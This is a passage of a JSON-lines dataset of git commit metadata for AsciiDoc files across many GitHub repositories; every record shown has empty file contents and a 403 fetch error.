event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2022\/dutchclojureday.adoc","new_file":"content\/events\/2022\/dutchclojureday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"493d4cdda4f5e844fcab9c637d83f9d7c6e69c98","subject":"Update 2015-09-24-AS-kuaijj.adoc","message":"Update 2015-09-24-AS-kuaijj.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-24-AS-kuaijj.adoc","new_file":"_posts\/2015-09-24-AS-kuaijj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"accc827b81d58333c515494735c0b529ceb60010","subject":"Update 2015-10-04-Impressum.adoc","message":"Update 2015-10-04-Impressum.adoc","repos":"woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io","old_file":"_posts\/2015-10-04-Impressum.adoc","new_file":"_posts\/2015-10-04-Impressum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/woehrl01\/woehrl01.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62ebd4b11b06f149f533c6561db16bd7b5350c78","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f100722bffad4e6b44aee220731b709e32f509e5","subject":"Update 2016-08-19-laravel-with-pusher.adoc","message":"Update 2016-08-19-laravel-with-pusher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ff8749e109cb6606e4b6e5ca81a615d4bea0e7b","subject":"job: #11981 Introduce analysis note of requirements tag population and rendering.","message":"job: #11981 Introduce analysis note of requirements tag population and 
rendering.\n","repos":"lwriemen\/mc,xtuml\/mc,cortlandstarrett\/mc,lwriemen\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,xtuml\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,lwriemen\/mc,rmulvey\/mc,leviathan747\/mc,leviathan747\/mc,leviathan747\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,xtuml\/mc,cortlandstarrett\/mc,xtuml\/mc,leviathan747\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc","old_file":"doc\/notes\/11444_wasl\/11981_reqs_ant.adoc","new_file":"doc\/notes\/11444_wasl\/11981_reqs_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de86c1b27bbe0b025b2641e6a0934c5c6df83b62","subject":"Update Yubikey_and_SSH_via_PAM.adoc","message":"Update Yubikey_and_SSH_via_PAM.adoc","repos":"eworm-de\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,madrat-\/yubico-pam","old_file":"doc\/Yubikey_and_SSH_via_PAM.adoc","new_file":"doc\/Yubikey_and_SSH_via_PAM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"7a1d69cc7c223bdb3329ab9c72762bfb58df6ebb","subject":"Update 2016-02-26-Ganttnam-Style.adoc","message":"Update 2016-02-26-Ganttnam-Style.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Ganttnam-Style.adoc","new_file":"_posts\/2016-02-26-Ganttnam-Style.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee1c77abbba1a4882108e7b87983a302dd834a0c","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bfd5099f17667f6984a5e638f68f0673ea42eae","subject":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","message":"Update 2018-11-27-Hugo-Ascii-Doc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_file":"_posts\/2018-11-27-Hugo-Ascii-Doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdae15329a8b49f4df42e3e7b68119e4730ec9f1","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 
2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0d89674e28013fa52fe8c701fd4d449cf3dec5b","subject":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","message":"Update 2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_file":"_posts\/2017-09-09-Postgre-S-Q-L-My-S-Q-L-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d49f644d2eb454882c377e0fd7ce75aa9cda784","subject":"fix #20 - update readme","message":"fix #20 - update readme\n","repos":"cescoffier\/vertx-forge-addon,cescoffier\/vertx-forge-addon,cescoffier\/vertx-forge-addon","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cescoffier\/vertx-forge-addon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3502f59c3bfebcdfb5567ec29052e1c937e6cb87","subject":"y2b create post LG G4 Unboxing \\u0026 Giveaway","message":"y2b create post LG G4 Unboxing \\u0026 Giveaway","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-05-06-LG-G4-Unboxing-u0026-Giveaway.adoc","new_file":"_posts\/2015-05-06-LG-G4-Unboxing-u0026-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8c8980d3156a8ba42890cf40c15d192d0689ded","subject":"Update 2018-07-04-flexing.adoc","message":"Update 2018-07-04-flexing.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-04-flexing.adoc","new_file":"_posts\/2018-07-04-flexing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1cc36c3464c4e0edf674fe60cbeb6fc07048b4e","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"InsertKoinIO\/koin,Ekito\/koin,InsertKoinIO\/koin,InsertKoinIO\/koin,Ekito\/koin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ekito\/koin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"5b64412814592da0203ab22978117253dc48a893","subject":"docs: add information about the apiman distros","message":"docs: add information about the apiman distros","repos":"msavy\/apiman,apiman\/apiman,apiman\/apiman,apiman\/apiman,msavy\/apiman,apiman\/apiman,msavy\/apiman,apiman\/apiman,msavy\/apiman,msavy\/apiman","old_file":"distro\/README.adoc","new_file":"distro\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apiman\/apiman.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8daefdd5d7f841fded15cf979da03a8d4397ffbe","subject":"Add Sina Samavati","message":"Add Sina Samavati\n","repos":"the-concurrent-schemer\/scm,bsmr-erlang\/scm,the-concurrent-schemer\/scm,bsmr-erlang\/scm","old_file":"THANKS.asciidoc","new_file":"THANKS.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bsmr-erlang\/scm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdd1b53cbb8b2a0a8c55ceae736b7b2fd4b45771","subject":"Problem: executing emerald-rs throws a \"cannot bind to socket error\"","message":"Problem: executing emerald-rs throws a \"cannot bind to socket error\"\n\nSolution: point parity to a different port\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2d51d4ec66a3e7969552242e8afb3c1f71a76b1","subject":"Http basic authentication support added for boot-mon server.","message":"Http basic authentication support added for boot-mon server.\n","repos":"iyzico\/boot-mon,iyzico\/boot-mon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iyzico\/boot-mon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"42234074f082b9d67b9215f61a79e3b52230698c","subject":"Replace obsolete gradle plugin link","message":"Replace obsolete gradle plugin link\n\nThe gradle plugin link is not working anymore. 
The new link refers to a plugin I've created.","repos":"cthiebaud\/jaxrs-analyzer,sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6df4a5c6754671a03c6d250f9d939a4e161ad3b4","subject":"read me","message":"read me\n","repos":"tomdkt\/Stream,tomdkt\/Stream,tomdkt\/Stream","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomdkt\/Stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"531f4754cb4ae2451c1250aec0fbd6a5446a04c0","subject":"Update 2015-03-22-Hallo-Welt.adoc","message":"Update 2015-03-22-Hallo-Welt.adoc","repos":"woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io,woehrl01\/woehrl01.hubpress.io","old_file":"_posts\/2015-03-22-Hallo-Welt.adoc","new_file":"_posts\/2015-03-22-Hallo-Welt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/woehrl01\/woehrl01.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71d1adb4fbdacbd9f5d0a3f9a79231e18265197c","subject":"Update 2016-12-02-Cloudfiy-rabbitmq.adoc","message":"Update 2016-12-02-Cloudfiy-rabbitmq.adoc","repos":"lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io,lifengchuan2008\/lifengchuan2008.github.io","old_file":"_posts\/2016-12-02-Cloudfiy-rabbitmq.adoc","new_file":"_posts\/2016-12-02-Cloudfiy-rabbitmq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lifengchuan2008\/lifengchuan2008.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d68f018ce4defb722016093919322157ec7baeda","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"juxt\/tick,juxt\/tick","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/tick.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ee508ee1bae26f6b6a82e172a19537e044323c2","subject":"Fix #397 (#398)","message":"Fix #397 (#398)\n\n* Fix #397\r\n\r\nadd adoc with system properties\r\n\r\n* Fix #397\r\n\r\nadd more details to system properties table\r\nalphabetise system properties\r\n\r\n* Fix #397\r\n\r\nedit getBoolean","repos":"OpenHFT\/Chronicle-Core","old_file":"systemProperties.adoc","new_file":"systemProperties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c880eb32368dae003f8ad213a511640dcdfd3df8","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"093c924a028800703bc4bc3b071f6bd94e59c465","subject":"Update 2016-02-04-Hallo-from-Tekk.adoc","message":"Update 2016-02-04-Hallo-from-Tekk.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_file":"_posts\/2016-02-04-Hallo-from-Tekk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae69c0505eed0ce10aa58af338ed20f8037243e4","subject":"Update 2015-05-04-Markdown-App.adoc","message":"Update 2015-05-04-Markdown-App.adoc","repos":"niole\/niole.github.io,niole\/niole.github.io,niole\/niole.github.io","old_file":"_posts\/2015-05-04-Markdown-App.adoc","new_file":"_posts\/2015-05-04-Markdown-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/niole\/niole.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4f39c6d7d5b7b4d6c6ff700e7d3faf4371c8f72","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e05712de9a9d245cd437eb7fa57189dd5319fce9","subject":"Update 2015-02-18-Linux-HowTo-Encrypt-And-Decrypt-Files-With-A-Password.adoc","message":"Update 2015-02-18-Linux-HowTo-Encrypt-And-Decrypt-Files-With-A-Password.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-18-Linux-HowTo-Encrypt-And-Decrypt-Files-With-A-Password.adoc","new_file":"_posts\/2015-02-18-Linux-HowTo-Encrypt-And-Decrypt-Files-With-A-Password.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dec1817844f1e882f154aa25f43e4c90903e3498","subject":"Cancel maven plugin setup","message":"Cancel maven plugin setup\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30fababf4c5ee0c57264de43cc50342a282a8eda","subject":"TAMAYA-194: Added Refreshable interface, updated docs.","message":"TAMAYA-194: Added Refreshable interface, updated 
docs.\n","repos":"apache\/incubator-tamaya,apache\/incubator-tamaya,apache\/incubator-tamaya","old_file":"src\/site\/asciidoc\/extensions\/mod_mutable_config.adoc","new_file":"src\/site\/asciidoc\/extensions\/mod_mutable_config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"352010b627c507ff72b002e450a18eff1e4644d1","subject":"blog: cheating n queens","message":"blog: cheating n queens\n","repos":"bibryam\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2014-05-12-CheatingOnTheNQueensBenchmark.adoc","new_file":"blog\/2014-05-12-CheatingOnTheNQueensBenchmark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ee1aaa84d0bc1634d29816486c129d6b013dd5c","subject":"Update 2001-01-01-tron-dance.adoc","message":"Update 2001-01-01-tron-dance.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2001-01-01-tron-dance.adoc","new_file":"_posts\/2001-01-01-tron-dance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f786577cfdfb62717f32e33885a9ca0530ceea56","subject":"updating to latest Docker CE","message":"updating to latest Docker CE\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_file":"developer-tools\/java\/chapters\/ch05-compose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"71cac1010e0afbb728f64b567f026e563ee35ff9","subject":"update API doc","message":"update API doc\n","repos":"sirjorj\/libxwing","old_file":"API.adoc","new_file":"API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"eb617fee2e6e4b4f6cd15a1486f9a65eb8d8a6db","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"36d8e4d041e496db1ab7f70e0765a2045509f4de","subject":"Update 2016-08-29-Hello-World.adoc","message":"Update 2016-08-29-Hello-World.adoc","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"_posts\/2016-08-29-Hello-World.adoc","new_file":"_posts\/2016-08-29-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aaf75bc3fe776f16fa86caec9019f0f8d5f2884b","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"572a78e53ecf11fb3bf2261cb3e52137c2eb8c94","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb46416f60bf64475d0213083a6ed98e65d2991f","subject":"Added a README","message":"Added a README\n","repos":"feedhenry-raincatcher\/raincatcher-demo-portal,feedhenry-raincatcher\/raincatcher-demo-portal,feedhenry-raincatcher\/raincatcher-demo-cloud","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feedhenry-raincatcher\/raincatcher-demo-cloud.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43259540ef555c31d4b0d2ecb3207742a78fa425","subject":"Changed README","message":"Changed README\n","repos":"pschalk\/camunda-bpm-custom-batch","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pschalk\/camunda-bpm-custom-batch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9030532cac510476e5c7080ba4bd339fe664b1c1","subject":"Now hosted on GitLab","message":"Now hosted on GitLab\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-uuid,sdavids\/sdavids-commons-uuid","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-uuid.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"830ca4f9705394cb2fe11b4d787febb36ede305d","subject":"update README to Asciidoctor 1.5.0-compatible syntax","message":"update README to Asciidoctor 
1.5.0-compatible syntax\n","repos":"asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c5bbde47021d4c88d12c34e8395ec54d4d39f99","subject":"add dutch clojure day 2020","message":"add dutch clojure day 2020\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2020\/dutchclojureday.adoc","new_file":"content\/events\/2020\/dutchclojureday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ba70af5dfec9643a876ebaa6a95835f63f5a4723","subject":"Update 2015-10-29-first-testing.adoc","message":"Update 2015-10-29-first-testing.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-10-29-first-testing.adoc","new_file":"_posts\/2015-10-29-first-testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"755f6e8b32d219bd4b86d09fd480395d65723b92","subject":"Update 2016-05-21-Test-Math-Jax.adoc","message":"Update 2016-05-21-Test-Math-Jax.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-21-Test-Math-Jax.adoc","new_file":"_posts\/2016-05-21-Test-Math-Jax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80c5aa31591e9a42797fb9a333a58c43fdfd78f6","subject":"_posts\/2016-07-06-Quadruplexes2.adoc","message":"_posts\/2016-07-06-Quadruplexes2.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-06-Quadruplexes2.adoc","new_file":"_posts\/2016-07-06-Quadruplexes2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"852fc9cf8924a0d042e58b76377c5228d2e2cc40","subject":"Update 2017-02-14-Stuff-test.adoc","message":"Update 